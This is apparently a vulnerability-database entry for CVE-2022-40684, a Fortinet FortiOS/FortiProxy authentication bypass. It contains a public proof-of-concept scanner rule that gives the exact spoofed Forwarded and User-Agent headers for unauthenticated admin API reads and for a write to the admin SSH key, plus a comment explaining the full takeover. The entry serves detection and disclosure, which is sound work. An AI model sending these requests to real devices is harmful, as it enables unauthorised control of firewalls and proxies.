CVE-2022-40684: Fortinet FortiOS admin Remote Command Execution Vulnerability (authentication bypass on the administrative interface)

Date: 2025-09-01 | Affected software: Fortinet FortiOS | PoC: public

Vulnerability description

Fortinet said on Monday that CVE-2022-40684, an authentication bypass patched the previous week, is being widely exploited in the wild. It is an authentication bypass on the administrative interface: the API access check trusts requests that carry a Forwarded header claiming a 127.0.0.1 client and a "Report Runner" or "Node.js" User-Agent, so a remote, unauthenticated threat actor can issue administrative REST calls (for example, add an SSH public key to the built-in admin account and then log in over SSH) on FortiGate firewalls, FortiProxy web proxies and FortiSwitch Manager (FSWM) on-premises management instances. Affected versions: FortiOS 7.0.0 through 7.0.6 and 7.2.0 through 7.2.1, FortiProxy 7.0.0 through 7.0.6 and 7.2.0, FortiSwitchManager 7.0.0 and 7.2.0.

Fingerprint: title="FortiProxy"

PoC code [public]

id: CVE-2022-40684

info:
  name: Fortinet FortiOS admin Remote Command Execution Vulnerability (CVE-2022-40684 authentication bypass)
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Fortinet said on Monday that CVE-2022-40684, an authentication bypass patched the previous week, is being widely exploited in the wild. It is an authentication bypass on the administrative interface that lets remote threat actors log in to FortiGate firewalls, FortiProxy web proxies and FortiSwitch Manager (FSWM) on-premises management instances.
    Fingerprint: title="FortiProxy"
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
    - http://wiki.peiqi.tech/wiki/iot/Fortinet/Fortinet%20FortiOS%20admin%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-40684.html

rules:
  # r0: unauthenticated read of the admin account list. The spoofed Forwarded
  # header (client claimed to be 127.0.0.1) plus the "Node.js" User-Agent make
  # the API access check treat the request as a trusted local process; a
  # vulnerable device answers with the admin objects, password masked as "ENC XXXX".
  r0:
    request:
      method: GET
      path: /api/v2/cmdb/system/admin
      headers:
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root
    expression: response.body.bcontains(b'ENC XXXX') && response.body.bcontains(b'http_method')
  # r1: unauthenticated write to the built-in "admin" account. The key "123" is
  # deliberately invalid, so a vulnerable device rejects it with
  # "Invalid SSH public key." and its configuration is not changed; reaching
  # that validator without credentials is what proves the bypass. The real
  # attack submits a valid key and then logs in over SSH.
  r1:
    request:
      method: PUT
      path: /api/v2/cmdb/system/admin/admin
      headers:
        # Privileged User-Agent used by the public Horizon3 PoC; the original r1
        # omitted it and relied on the Forwarded header alone.
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
      body: |
        {
           "ssh-public-key1":"123"
        }
    expression: response.body.bcontains(b'Invalid SSH public key.') && response.body.bcontains(b'cli_error')
expression: r0() || r1()
